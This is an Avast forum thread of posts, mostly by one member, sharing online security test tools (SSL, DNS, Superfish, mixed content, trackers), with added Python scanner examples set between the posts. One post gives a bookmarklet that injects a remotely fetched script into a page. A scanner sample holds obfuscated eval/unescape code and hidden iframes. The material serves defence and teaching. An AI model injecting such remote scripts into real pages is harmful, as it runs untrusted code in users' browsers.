Title: Re: Tests and other Media topics
Post by: polonus on February 26, 2015, 07:12:58 PM
Is avast vulnerable? http://dnssec-debugger.verisignlabs.com/forum.avast.com
-> https://www.uploady.com/download/5oAte0Qd2qw/0GQE66YVdXA2afhl

Superfish is very big to handle.....

Damian
Title: Re: Tests and other Media topics
Post by: polonus on March 04, 2015, 01:00:08 AM
Do this test to see whether your web client is vulnerable to the Freak Attack Threat:
https://www.freakattack.com/clienttest.html
My results Good News! Your browser appears to be safe from the FREAK Attack!
If you're curious, your client currently offers the following cipher suites:

But read: https://community.qualys.com/thread/12169
Checked OK here: https://www.ssllabs.com/ssltest/viewMyClient.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 05, 2015, 05:40:28 PM
As Open DNS now brought Nlp checking for domains - so checking the domain name comes with the same ASN and resembling domains  like -g00gle.com will get 2 minus points.
But we can also test websites here for Nlp: http://nlp-system.com.statstool.com/
and combine with this scan: http://www.dnsinspect.com/
Enjoy, my friends, enjoy.

polonus
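In the spirit of the OpenDNS check above (a look-alike such as g00gle.com losing two points), here is an added example of how such a resemblance score can be computed; it is not OpenDNS's algorithm, and the brand watch list, homoglyph table and point values are my own assumptions:

```python
"""Score a domain name for resemblance to well-known brands, in the spirit of
the OpenDNS check the post mentions (g00gle.com losing 2 points).  Added
example, not OpenDNS's algorithm; the brand list, homoglyph table and the
point values are my own assumptions."""
from typing import List, Tuple

BRANDS = ["google", "avast", "paypal", "microsoft"]   # assumed watch list
# Digit/letter look-alikes that typosquatters substitute (assumed table).
HOMOGLYPHS = [("0", "o"), ("1", "l"), ("3", "e"), ("4", "a"), ("5", "s"),
              ("7", "t"), ("vv", "w"), ("rn", "m")]


def normalise(label: str) -> str:
    """Fold look-alike characters so g00gle -> google, rnicrosoft -> microsoft."""
    s = label.lower()
    for fake, real in HOMOGLYPHS:
        s = s.replace(fake, real)
    return s


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (a transposition counts as two edits here)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def second_level_label(domain: str) -> str:
    """'forum.avast.com' -> 'avast' (naive: ignores multi-part TLDs like co.uk)."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def lookalike_score(domain: str) -> Tuple[int, List[str]]:
    """Return (points, reasons); 0 means no resemblance found or an exact brand."""
    label = second_level_label(domain)
    folded = normalise(label)
    points, reasons = 0, []
    for brand in BRANDS:
        if label == brand:
            return 0, []                       # the brand's own domain
        if folded == brand:
            points -= 2
            reasons.append(f"homoglyph spelling of {brand}")
        elif edit_distance(label, brand) == 1:
            points -= 2
            reasons.append(f"one edit away from {brand}")
        elif brand in label.split("-") or brand in folded:
            points -= 1
            reasons.append(f"embeds brand name {brand}")
    return points, reasons
```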
Title: Re: Tests and other Media topics
Post by: bob3160 on March 05, 2015, 08:39:51 PM
As Open DNS now brought Nlp checking for domains - so checking the domain name comes with the same ASN and resembling domains  like -g00gle.com will get 2 minus points.
But we can also test websites here for Nlp: http://nlp-system.com.statstool.com/ (http://nlp-system.com.statstool.com/)
and combine with this scan: http://www.dnsinspect.com/ (http://www.dnsinspect.com/)
Enjoy, my friends, enjoy.

polonus
We can also use Avast's Online Security module and make sure the Site Correct function is checked:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1425584318772-10029.png)
This will prevent you from getting to that bad site in the first place. :)
Title: Re: Tests and other Media topics
Post by: polonus on March 05, 2015, 08:50:59 PM
Hi bob3160,

I always have an eye out on the green circle there.
See my settings now: https://www.uploady.com/download/MYNvUuPtuYV/iL9cBzhb2kcEbfJy

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 06, 2015, 05:50:35 PM
WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
What web to check can be found here: http://whatweb.net/
To find out what websites are Built With, check here: http://builtwith.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 10, 2015, 06:08:33 PM
Adsense banned checker: http://www.bannedbyadsense.com/
and another: http://www.isbanned.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 14, 2015, 05:13:04 PM
A GZip Discrimination test: http://nontroppo.org/tools/gziptest/?url=
Opera users can use this button to drag to a toolbar of choice: opera:/button/Go to page, %22http://nontroppo.org/tools/gziptest/?url=%25u%22

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 18, 2015, 10:07:12 PM
Test for Superfish in Google Chrome: https://lastpass.com/superfish/
For firefox there is this extension: https://addons.mozilla.org/en-us/firefox/addon/superfish-checker/?src=cb-dl-recentlyadded

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on March 18, 2015, 11:00:00 PM
Test for Superfish in Google Chrome: https://lastpass.com/superfish/ (https://lastpass.com/superfish/)
For firefox there is this extension: https://addons.mozilla.org/en-us/firefox/addon/superfish-checker/?src=cb-dl-recentlyadded (https://addons.mozilla.org/en-us/firefox/addon/superfish-checker/?src=cb-dl-recentlyadded)

polonus

You can also run the LastPass test in Firefox if you're using FF 37.0 :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1426715840242-32424.png)
Title: Re: Tests and other Media topics
Post by: polonus on March 18, 2015, 11:04:26 PM
Does http://screenshots.screencast-o-matic.com/screenshot/u/Lh/1426715840242-32424.png
work for all as in bob3160's reply? Hi bob, you and I are secure  ;D

See attached...
Title: Re: Tests and other Media topics
Post by: polonus on March 25, 2015, 03:50:14 PM
Is your DNS hijacked?
Test here: https://www.ismydnshijacked.com/
If your router DNS settings were not altered by cybercriminals,
then all is well.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 04, 2015, 08:01:25 PM
To those who know how to protect themselves: a message on the ScriptSafe and uMatrix extensions for Google Chrome.

These two extensions are the best in-browser security related extensions that can be installed into the Google Chrome browser, and the combination can be compared to the NoScript and RequestPolicy add-on combination for Firefox.
Working both extensions does not require rocket science, but if you want to surf dumbed down, on full automatic, clicking on anything that shows up on the browser screen until your PC or laptop is in a doorstopper-only state, please do not read on. When you trust others to take care of your browser security and you do not want to have anything to do with it, this posting is not meant for you.
For the others, this is not too hard. First know where you are going. Whenever you are visiting a link from a search page that is not flagged as suspicious (Avast Online Security warning, Bitdefender TrafficLight alert, DrWeb URL checker warning, Google Safebrowsing or Yandex blacklisting alert or privacy alert), or a website you visited before, work ScriptSafe green: allow the main site and block third parties, or also allow third parties when that is needed for the full functionality of that page (else leave these blocked). For uMatrix you follow a similar procedure: only click there if you need additional blocking or when you need more functionality on a certain secure webpage.
Rule 1: when you get an alert from Avast Online Security or the Avast Shields, or the Bitdefender TrafficLight extension, or DrWeb's, or a Google Safebrowsing or Yandex alert, do not go to that destination and do not visit that website. When you are a responsible guy or gal, report the link with hxtp or wXw so the unaware cannot get infected by clicking a live link. We have a section for that here on the forums, the virus and worms section, or report to virus@avast.com.
Really folks, these two extensions can be learned to be toggled, and the additional bonus is advanced security (you can block any frame, any script you like inside the extension), more insight into what threatening things can arrive at your browser from the Interwebs, and additional privacy by blocking scripts that try to track you with analytics, ads, widgets etc.
Install ScriptSafe and uMatrix from the Google Webstore https://chrome.google.com/webstore/detail/scriptsafe/oiigbmnaadbkfbmpbfijlflahbdbdgdf
and
https://chrome.google.com/webstore/detail/%C2%B5matrix/ogfcmafjalglgifnmanfmnieipoejdcf
learn to point and click and enjoy the advanced browser security you have gained through a couple of right toggling clicks.

An important observation - always toggle uMatrix first and then adjust ScriptSafe, just in that order!

Users who want to experience a uMatrix-like extension in Firefox should try Policeman:
https://addons.mozilla.org/nl/firefox/addon/policeman/
It also supports rules based on content type: images, styles, scripts, frames etc.
The purpose of the extension is similar to NoScript and RequestPolicy.

When uMatrix comes to Firefox, we will have a hard time choosing between Chrome and Firefox;
I am a bit tired of the increasing bloat of these "googlalities",
but the search versatility keeps me aboard.

Just look at a YouTube website through the eyes of uMatrix, with some 248 items that can be toggled.
Google is the Big Tracking machine par excellence.
For that reason I added Stop Tracking -> chrome://extensions/?id=cjadnibdialbplafleaocjllgggfflko
and you won't be tracked any longer.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 05, 2015, 05:32:21 PM
Who is using this block list in the hosts file?
Re http://pgl.yoyo.org/adservers/serverlist.php?showintro=0;hostformat=hosts

One of the blocked items: https://www.mywot.com/en/scorecard/cash4webmaster.de?utm_source=addon&utm_content=popup
Spam. Scam and Ponzi Schemes...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 07, 2015, 11:11:28 AM
I did not notice this before, VT now gives Snort and Suricata IDS alerts.

An example here:
exploit detection
https://www.virustotal.com/en/file/961751ef6378515dc09a94135fa0c23d133aa41ae6dc2267340067773f51efde/analysis/

This is an important enhancement of VirusTotal's scan capabilities; I can therefore compare these detections now with urlquery dot net scan results and the IDS alerts there and the Fortinet findings.
And checking on the alerts, like "ET POLICY HTTP Request on Unusual Port Possibly Hostile (Potential Corporate Privacy Violation)", leads us to these resources: http://www.aldeid.com/wiki/Suricata-vs-snort/Test-cases/Malwares-viruses. These test cases may be revealing, so one may learn what kind of malware comes 'covered by these rules'. So combining Snort rule detection patterns can narrow down detection. Also one could compare the Fortinet findings from urlquery dot net and go after (search) either the malware name or IP preceded by the term Clean MX. So the search query "clean mx Packed.Generic.187" delivers, realtime:
http://support.clean-mx.de/clean-mx/md5.php?Sophos=Mal/Behav-351; this is a simple identification, see: https://malwr.com/analysis/MDMzOWM3MDM4Y2JhNDllMmI0YTFmN2MxOTdmMTAxNjA/  and then we return to the detailed Snort analysis:
Quote
Packed.Generic.187
Test: 84dc4e81531c373e431d818790dd26d1
Payload: pcap
Suricata trace:
ET USER_AGENTS Suspicious Mozilla User-Agent - Likely Fake
BACKDOOR rogue software ms antispyware 2009 runtime detection
Suricata score: 1
Snort trace:
A Network Trojan was detected
I think users should always have VT as a pre-checker in the browser now just one click away, for example via VTchromizer.
Read here from Madras Geek: http://www.madrasgeek.com/2010/12/scan-for-virus-malware-removal-with-virustotal-chromizer.html  download VTChromizer here-> https://chrome.google.com/extensions/detail/efbjojhplkelaegfbieplglfidafgoka

For the real g33ks and aware, a nice pcap collection here: https://www.mediafire.com/?a49l965nlayad#a49l965nlayad (info credits Mila Parkour) Be aware do not open payloads.

polonus

Title: Re: Tests and other Media topics
Post by: polonus on April 11, 2015, 05:40:52 PM
Website Test behind the Great Firewall of China for various locations:
http://www.websitepulse.com/help/testtools.china-test.html
and http://www.greatfirewallofchina.org/
and here: https://en.greatfire.org/
DNS tests: http://viewdns.info/chinesefirewall/
See attached our forum website seems blocked:
Contradictory results here: https://en.greatfire.org/https/forum.avast.com/index.php

pol
Title: Re: Tests and other Media topics
Post by: polonus on April 12, 2015, 11:58:18 PM
What uMatrix is blocking as malware domains/just domains - updated 3rd-party assets.
Those users here on the forums working ScriptSafe next to uMatrix would like to have this info.
updated 3rd-party assets: https://github.com/gorhill/uMatrix/commit/d2ed6778c59d2592ecb3f854a4853b522e38ec30
Also look here: https://github.com/gorhill/uMatrix/blob/master/assets/umatrix/blacklist.txt
# Blacklist maintained by HTTP Switchboard (the pre-decessor of the uMatrix extension).
# For those domain names which are not found in other blacklists
enjoy....

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 15, 2015, 10:49:07 PM
Cookie checker test: http://www.123simples.com/website-cookie-test.asp
see: http://websitecookiechecker.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 17, 2015, 11:21:38 AM
To-day I was surveying at a design coding exam at a Higher Educational Institute for IT staff outbuilding, and polonus would not be polonus if he did not go over the code.
"public Void" was staring back at me, and I combined that with the words "override" and "XSS exploitable".
Re: http://ricardozuasti.com/2012/stronger-anti-cross-site-scripting-xss-filter-for-java-web-apps/
See: https://github.com/tonyzampogna/XssSanitizer/blob/master/test/unit/org/tonyzampogna/xss/sanitizer/util/XssSanitizerUtilTest.java
This example shows how in the JVM memory system two objects are at a different address while the stored parameter is in the same memory location, and is overwritten by the second method. This is the basis of the "vulnerability".
Actually it is a so-called C vulnerability, that you need not live with if you develop in Java.

info credits go to thomas-pornin

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 17, 2015, 11:43:43 AM
Test whether an IIS server has been patched with MS15-034.
Go here: https://lab.xpaw.me/MS15-034/
Example: Cannot discern patch status of www.iisprotect.com. This most likely means it is not vulnerable.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 17, 2015, 01:26:52 PM
Check and secure Browser and Plug-in check: http://www.check-and-secure.com/browsercheck/_en/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 17, 2015, 04:55:26 PM
A nice companion for Google Chrome's ScriptSafe and uMatrix and uBlock extensions is
Webpage behavior report tool known as Browser JSGuard -
Supported by DeitY & CERT-In, Govt. of India

An Addon for Detecting Malicious and Suspicious Webpages.
Features:
Content/Heuristic based web malware protection.
Alerts the user on malicious web pages.
Provides detailed analysis of a webpage (by clicking on the icon present in the Addon bar).

It checks for Hidden iFrame(s) Redirections.
UnAuthorized Redirections
Encoded Javascript
External Domain Requests
Trackers

Download: https://chrome.google.com/webstore/detail/browserjsguard/ncpkigeklafkopcelcegambndlhkcbhb

I tested it and rather like this extension.

polonus
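To make the feature list above concrete, here is an added example (not JSGuard's own code) of what checks for hidden iframes, encoded JavaScript and external domain requests look like, run over a constructed page; the sample page, the thresholds and the naive two-label "registrable domain" rule are my own assumptions:

```python
"""Page heuristics of the kind the Browser JSGuard feature list names: hidden
iframes, encoded JavaScript and requests to external domains.  Added example,
not JSGuard's code; the sample page, thresholds and the naive two-label
"registrable domain" rule are my own assumptions."""
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# Constructed page, assumed to be served from www.example.com.
SAMPLE_PAGE = """<html><head>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script>var p = unescape("%3Cscript%20src%3D%22http%3A%2F%2Fexample.net%2Fx.js%22%3E");
document.write(p);</script>
<script>eval(String.fromCharCode(100,111,99,117,109,101));</script>
</head><body>
<iframe src="http://example.net/frame.html" width="0" height="0"></iframe>
<iframe src="https://www.example.com/ok.html" style="width:600px"></iframe>
<iframe src="http://example.org/h.html" style="display:none;position:absolute"></iframe>
<img src="https://cdn.example.com/logo.png">
</body></html>"""

# Patterns typical of packed/obfuscated inline scripts (heuristic, not proof).
ENCODING_PATTERNS = [
    (r"\bunescape\s*\(", "unescape() of a percent-encoded payload"),
    (r"String\.fromCharCode\s*\((?:\s*\d+\s*,){5,}", "long String.fromCharCode list"),
    (r"(?:\\x[0-9a-fA-F]{2}){8,}", "long \\x hex-escaped string"),
    (r"\beval\s*\(", "eval() of generated code"),
]


class PageCollector(HTMLParser):
    """Collect iframes, auto-loaded resource URLs and inline script bodies."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, str]] = []
        self.resources: List[str] = []
        self.inline_scripts: List[str] = []
        self._script_buf: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(a)
        if tag == "script":
            self._in_script, self._script_buf = True, []
        src = a.get("src") or (a.get("href") if tag == "link" else "")
        if src and tag in ("iframe", "script", "img", "embed", "link"):
            self.resources.append(src)

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._script_buf).strip()
            if body:
                self.inline_scripts.append(body)


def is_hidden_iframe(attrs: Dict[str, str]) -> bool:
    """Zero/one-pixel or display:none/visibility:hidden iframes are the
    classic vehicle for silent drive-by redirections."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        m = re.match(r"(\d+)", attrs.get(dim, "")) or re.search(dim + r":(\d+)", style)
        if m and int(m.group(1)) <= 1:
            return True
    return False


def external_domains(urls: List[str], page_host: str) -> List[str]:
    """Hosts outside the page's (naively computed) registrable domain."""
    base = ".".join(page_host.lower().split(".")[-2:])
    hosts = {urlparse(u).hostname for u in urls}
    return sorted(h for h in hosts
                  if h and h != base and not h.endswith("." + base))


def scan_page(html: str, page_host: str) -> Dict[str, list]:
    """Run the three heuristics and return what each flagged."""
    c = PageCollector()
    c.feed(html)
    c.close()
    return {
        "hidden_iframes": [f.get("src", "") for f in c.iframes if is_hidden_iframe(f)],
        "encoded_scripts": [
            [why for pat, why in ENCODING_PATTERNS if re.search(pat, body)]
            for body in c.inline_scripts
            if any(re.search(pat, body) for pat, _ in ENCODING_PATTERNS)
        ],
        "external_domains": external_domains(c.resources, page_host),
    }
```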
Title: Re: Tests and other Media topics
Post by: polonus on April 17, 2015, 10:27:32 PM
Real tracking is more extensive than extensions show you.....
See real results via txt file attached
Bitdefender blocks Comscore Beacon and OneStat Tracker, ScriptSafe blocks <WEBBUG> (1)
Ghostery blocks TradeDesk, Avast Online Security does not block any.
Disconnect blocks Google Analytics. uMatrix blocks screencast-o-matic.com. *
http://screencast-o-matic.com links to the following External Domains:
==>twitter-badges.s3.amazonaws.com
==>platform.twitter.com
==>facebook.com  & facebook tracker found.

So there is much more tracking going on under the browser hood than we learn from Bitdefender, DrWeb's, Avast,
Ghostery, Disconnect and the others. The following sites know that you have visited this page:
The following sites know that you visited this page. Click on a site to find out what more it knows about you.
-adsrvr.org
-bing.com
-bkrtx.com
-idg.nl
-leadboxer.com
-plista.com
-stepstone.nl

polonus

P.S. -sync.search.spotxchange.com and others blocked by μMatrix
Title: Re: Tests and other Media topics
Post by: polonus on April 22, 2015, 11:04:39 PM
Syntax validator online: http://esprima.org/demo/validate.html

enjoy
Title: Re: Tests and other Media topics
Post by: polonus on April 23, 2015, 07:16:08 PM
Check your internet connection in three steps: http://www.check-and-secure.com/ipcheck/_en/solution/clean.php

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on April 23, 2015, 09:52:11 PM
Real tracking is more extensive than extensions show you.....
See real results via txt file attached
Bitdefender blocks Comscore Beacon and OneStat Tracker, ScriptSafe blocks <WEBBUG> (1)
Ghostery blocks TradeDesk, Avast Online Security does not block any.
Disconnect blocks Google Analytics. uMatrix blocks screencast-o-matic.com. *
http://screencast-o-matic.com (http://screencast-o-matic.com) links to the following External Domains:
==>twitter-badges.s3.amazonaws.com
==>platform.twitter.com
==>facebook.com  & facebook tracker found.

So there is much more tracking going on under the browser hood than we learn from Bitdefender, DrWeb's, Avast,
Ghostery, Disconnect and the others. The following sites know that you have visited this page:
The following sites know that you visited this page. Click on a site to find out what more it knows about you.
-adsrvr.org
-bing.com
-bkrtx.com
-idg.nl
-leadboxer.com
-plista.com
-stepstone.nl

polonus

P.S. -sync.search.spotxchange.com and others blocked by μMatrix
I've used and recommended Screencast-O-Matic for a few years.
It's my main program for creating instructional and other Video's.
I also use it to create screenshots which you'll find on many of the posts in this forum.
There is blocking and then there's getting a little out of hand.
Why not simply stop using any of the modern browsers and stop going to any of the websites ???
Title: Re: Tests and other Media topics
Post by: polonus on April 23, 2015, 11:08:13 PM
Hi bob3160,

Well, my demonstrating this is just for educational purposes, and just to show how one-sided the whole story has become.
It seems the user is just being tolerated for what known reasons, but does not play any role. The users are just generating clicks in a pay per click model.

And it is gonna get much worse when TTP arrives - companies and investors would be empowered to challenge regulations, rules, government actions and court rulings — federal, state or local — before tribunals and the role of governments and end-users will be further minimalized, as lawyers like to have their piece of the cake with these big international corporations.

That is where we are heading in the near future on both sides of the Atlantic and there is not much we can do about it,
so I will happily browse on while I can and use Google as my global instrument with Avast inside.  ;D

Damian
Title: Re: Tests and other Media topics
Post by: polonus on April 24, 2015, 06:39:54 PM
Example generated Javascript Alert Code
Copy and paste the code between the <head> </head> tags of your webpage. The alert will pop up on page load.
Code:
<SCRIPT LANGUAGE="JavaScript">
<!-- Hide from older browsers
alert('You are getting this alert at this very moment');
// end hiding -->
</SCRIPT>

Handy code generators here: http://www.htmlbasix.com/

And to bring in some randomness go here: http://www.randomcodegenerator.com/

pol
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2015, 02:03:10 PM
Is this a secure service?: https://www.dashlane.com/scan/11#/login

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on April 25, 2015, 04:08:32 PM
Is this a secure service?: https://www.dashlane.com/scan/11#/login (https://www.dashlane.com/scan/11#/login)

polonus
A service of Dashlane (https://www.dashlane.com/) the Password Manager program.
(if you trust them with your passwords, then this should be safe. :)

Title: Re: Tests and other Media topics
Post by: polonus on April 26, 2015, 03:04:51 PM
Mixed content still the easiest way to break SSL: http://blog.ivanristic.com/2014/03/https-mixed-content-still-the-easiest-way-to-break-ssl.html  (web article author = Ivan Ristić).
Check the insecure content on a website here: https://www.jitbit.com/sslcheck/
or here: https://www.whynopadlock.com/

Re: https://www.bram.us/2014/12/10/mixed-content-scan-scan-your-https-enabled-website-for-mixed-content/
Fix
The best strategy to avoid mixed content blocking is to serve all the content as HTTPS instead of HTTP.

For your own domain, serve all content as HTTPS and fix your links.  Often, the HTTPS version of the content already exists and this just requires adding an "s" to links - http:// to https://.

For other domains, use the site's HTTPS version if available. If HTTPS is not available, you can try contacting the domain and asking them if they can make the content available via HTTPS.

polonus
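As an added example, not code from the thread or from the scanners linked above: a small Python mixed-content scanner that applies the checks the post describes to a constructed sample page. It resolves relative and protocol-relative URLs against the page URL, separates active references (script, stylesheet, iframe, object, embed) from passive ones (images and media), and prints the http:// to https:// rewrite the post recommends; all hostnames in the sample are invented, and <link> elements other than stylesheets are left out of scope.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit, urlunsplit

# Which attribute carries the fetched URL for each element we look at.
URL_ATTRS = {
    "script": "src", "link": "href", "iframe": "src", "object": "data",
    "embed": "src", "img": "src", "audio": "src", "video": "src", "source": "src",
}
# Active mixed content can run code or restyle the page, so browsers block it.
# Passive mixed content (images, media) is usually loaded but the padlock is downgraded.
ACTIVE_TAGS = {"script", "link", "iframe", "object", "embed"}


def to_https(url):
    """The one-character fix the post describes: http:// -> https://."""
    parts = urlsplit(url)
    return urlunsplit(("https",) + tuple(parts[1:]))


class MixedContentParser(HTMLParser):
    """Collects every subresource reference that would be fetched over plain HTTP."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        attr = URL_ATTRS.get(tag)
        if attr is None or not attrs.get(attr):
            return
        # Only stylesheet <link>s are checked here; other rel values (icon,
        # preconnect, ...) are outside this example.
        if tag == "link" and "stylesheet" not in attrs.get("rel", "").lower().split():
            return
        # urljoin resolves "//cdn/x.js" and "/a.js" to the page's own scheme.
        absolute = urljoin(self.page_url, attrs[attr])
        if urlsplit(absolute).scheme != "http":
            return
        self.findings.append({
            "tag": tag,
            "url": absolute,
            "kind": "active" if tag in ACTIVE_TAGS else "passive",
            "fix": to_https(absolute),
        })


def scan_mixed_content(html, page_url):
    """Return the http:// subresources an HTTPS page at page_url would load."""
    if urlsplit(page_url).scheme != "https":
        raise ValueError("mixed content only applies to pages served over HTTPS")
    parser = MixedContentParser(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: two active and one passive mixed-content references,
# plus three references that are already fine (protocol-relative, relative, https).
SAMPLE_HTML = """
<html><head>
<script src="http://maps.example.com/api.js"></script>
<link rel="stylesheet" href="http://fonts.example.com/css?family=Open+Sans">
<script src="//cdn.example.com/lib.js"></script>
<script src="/local/app.js"></script>
</head><body>
<img src="http://images.example.com/logo.png">
<img src="https://images.example.com/banner.png">
</body></html>
"""

if __name__ == "__main__":
    for f in scan_mixed_content(SAMPLE_HTML, "https://www.example.com/index.html"):
        print(f"{f['kind']:7} <{f['tag']}> {f['url']}  ->  {f['fix']}")
```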
Title: Re: Tests and other Media topics
Post by: polonus on April 26, 2015, 05:41:53 PM
I often see a lot of sites with insecure login flagged by SaferChrome, like here:
SaferChrome: Insecure login: Password will be transmited in clear to http://www.dagelijksestandaard.nl/wp-login.php?redirect_to=%2F2015%2F04%2Fvijf-lekkere-snacks-die-je-koningsdag-nog-beter-maken%2F5%2F detected

Read: http://www.stealmylogin.com/ written by Alex Sirota
Exposing the dangers of insecure login forms *

The bookmarklet (from here *) used to test:
Code:
javascript:(function() {var s=document.createElement('script');s.src='http://data.stealmylogin.com/stealmylogin.js';document.getElementsByTagName('head')[0].appendChild(s);alert('StealMyLogin%20injected');})();

polonus

Title: Re: Tests and other Media topics
Post by: polonus on April 27, 2015, 12:27:32 AM
Testing for SHA-1 online.
Insecure, checked at: https://shaaaaaaaaaaaaa.com/check/www.tivo.com
results: Dang.
www.tivo.com is using SHA-1.
Which is too bad, because SHA-1 is becoming dangerously weak. It's time to upgrade to SHA-2.
Compare here:
http://toolbar.netcraft.com/site_report?url=https%3A%2F%2Fwww.tivo.com%2Ftivo-mma%2Flogin%2Fshow.do

Read on backgrounds: https://konklone.com/post/why-google-is-hurrying-the-web-to-kill-sha-1

On that page as a bonus a converter: http://konklone.io/json/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 01, 2015, 02:34:00 PM
Test your PHP code online here:
http://www.icosaedro.it/phplint/phplint-on-line.html
Results for some code I gave in:
Code:
PHPLint report
PHPLint 2.1_20150305
Copyright 2015 by icosaedro.it di Umberto Salsi
This is free software; see the license for copying conditions.
More info: http://www.icosaedro.it/phplint

BEGIN parsing of /tmp/test-61ynKJ
1:      <?php
2:      function rbl_lookup($ipv4) {

        function rbl_lookup($ipv4) {
                                  \_ HERE
==== 2: ERROR: undefined type for argument $ipv4 - Hint: you may indicate an explicit type (example: `/*.int.*/ $ipv4') or assign a default value (example: `$ipv4=123') or add a DocBlock line tag (example: `@param int $ipv4').
3:          $ip = explode(".", $ipv4);
4:          $rbl_url = ".rbl.blockedservers.com";
5:          $rbl_hostname = $ip[3].".".$ip[2].".

            $rbl_hostname = $ip[3].".".$ip[2].".
                                                \_ HERE
==== 5: Warning: found control character (carriage return, CR, 13) in literal string. This msg is reported only once for each string
6:                        ".$ip[1].".".$ip[0]."". $rbl_url;
7:
8:          $rbl_lookup = gethostbyname($rbl_hostname);
9:
10:         if($rbl_lookup == $rbl_hostname) {

            if($rbl_lookup == $rbl_hostname) {
                                           \_ HERE
==== 10: ERROR: comparing (string) == (string) - Hint: use strict comparison operator `===' instead.
11:             return 1;
12:         }
13:         else {
14:             return 0;
15:         }
16:     }
17:     ?>

END parsing of /tmp/test-61ynKJ
==== ?:?: notice: unused module mysql.php
==== ?:?: notice: unused module pcre.php
==== ?:?: notice: unused package stdlib/dummy.php
==== ?:?: notice: required module standard.php
Overall test results: 2 errors, 1 warnings.
Title: Re: Tests and other Media topics
Post by: polonus on May 05, 2015, 03:40:21 PM
Test - Check the Revocation Lists (CRL) and the OCSP status of an (SSL) Certificate
online here: http://certificate.revocationcheck.com/
Test Created by Paul van Brouwershaven

In the days of HTTPS Everywhere we need such checks more than ever.
Nice to combine with a Netcraft Tool Results report.

We even have some risk here: http://toolbar.netcraft.com/site_report?url=http://certificate.revocationcheck.com
Bad zone = alex.ns.cloudflare.com -> http://www.dnsinspect.com/cloudflare.com/1430833139
Read: https://blog.cloudflare.com/whats-the-story-behind-the-names-of-cloudflares-name-servers/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 05, 2015, 05:56:33 PM
I give an example of a problem site: solarlist.com: Identity verified, but with warnings
Encryption (HTTPS) (1)
Communication is encrypted
Site tries to load scripts from sources that weren't verified - so-called mixed content.
Possible Frontend SPOF from:

maps.google.com - Whitelist
(75%) - <script type='text/javascript' src='http://maps.google.com/maps/api/js?sensor=false&ver=1.0'>
html5shiv.googlecode.com - Whitelist
(71%) - <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js">
fonts.googleapis.com - Whitelist
(69%) - <link href='http://fonts.googleapis.com/css?family=Open+Sans:300,400,700' rel='stylesheet' type='text/css'>
(69%) - <link href='http://fonts.googleapis.com/css?family=Open+Sans:300,400,700' rel='stylesheet' type='text/css'>
s3.amazonaws.com - Whitelist
(11%) - <script src="//s3.amazonaws.com/scripts.hellobar.com/c42e00ca9c042c9f6457cf24ee9836a494d021b3.js" type="text/javascript">

See check: http://certificate.revocationcheck.com/solarlist.com

See: https://www.eff.org/https-everywhere/atlas/domains/solarlist.com.html

The following sites know that you visited this page. Click on a site to find out what more it knows about you.
-amazonaws.com
-google.com
-vimeo.com

Netcraft Website Risk Ranking 1 red out of 10: http://toolbar.netcraft.com/site_report?url=https://solarlist.com

Scanning target:  162.159.246.65 on port 443 ...

Found 1 servers with port 443 open
Checking for SSLv3 POODLE vulnerability...

IP address   Hostname   Status   Vulnerable ciphers
162.159.246.65      NOT Vulnerable   
Where I scanned this? Here: https://pentest-tools.com/vulnerability-scanning/ssl-poodle-scanner

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 08, 2015, 11:50:03 PM
Test for X-XSS-Protection: 1; mode=block: http://www.enhanceie.com/test/xss/BlockMode.asp

What is this? X-XSS-Protection is an HTTP header understood by Internet Explorer 8 (and newer versions). This header lets domains toggle on and off the "XSS Filter" of IE8, which prevents some categories of XSS attacks. IE8 has the filter activated by default, but servers can switch it off by setting it.
As it seems to me (proof is hard to find), it only protects against Reflected XSS (infosecisland.com/blogview/…), also because it does not have any means to detect Stored XSS (also called Persistent XSS). Info credits go to Luca Invernizzi at stackoverflow!

polonus

Netcraft extension and malware script detector will be flagging this and block it as well:
Quote
This page has been blocked by the Netcraft Extension for the following reason:

Suspected XSS Attack

